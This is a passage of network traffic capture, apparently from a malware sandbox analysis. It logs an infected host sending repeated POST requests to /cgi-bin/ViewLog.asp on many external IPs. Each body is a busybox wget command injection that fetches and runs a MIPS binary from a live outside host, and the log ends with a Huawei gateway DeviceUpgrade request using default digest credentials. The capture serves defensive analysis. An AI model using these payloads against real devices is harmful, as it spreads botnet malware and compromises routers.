                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.030466080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              235192.168.2.134220631.136.242.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.740991116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.326524019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.478615999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.910635948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:20.518501997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.734545946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.166429996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.030560017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              236192.168.2.134802294.153.204.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.774476051 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:11.991992950 CET556INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:11 GMT
                                              Server: Apache
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              237192.168.2.135902685.31.235.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.890223980 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.041253090 CET345INHTTP/1.1 404 Not Found
                                              Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:16:11 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              238192.168.2.135197485.69.23.448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.916188955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.454503059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.542598963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:15.910620928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:20.262501001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.966478109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.166512012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:22.982373953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              239192.168.2.134931662.78.38.28080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.979111910 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.196158886 CET75INHTTP/1.1
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              240192.168.2.135089095.163.100.278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.996237993 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:12.218159914 CET355INHTTP/1.1 333 Only buildin pages allowed
                                              Date: Thurs, 23 Nov 2023 4:16:4 GMT GMT
                                              Server: Webio Embedded server v1.0
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 33 33 33 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 45 72 72 6f 72 20 33 33 33 3a 20 4f 6e 6c 79 20 62 75 69 6c 64 69 6e 20 70 61 67 65 73 20 61 6c 6c 6f 77 65 64 3c 62 72 3e 3c 2f 68 32 3e 0d 0a 46 69 6c 65 3a 20 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 62 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Error 333</title></head><body><h2>Error 333: Only buildin pages allowed<br></h2>File: cgi-bin/ViewLog.asp<br></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              241192.168.2.133770494.122.89.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:11.996752024 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              242192.168.2.1348944156.241.92.16437215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.113759041 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
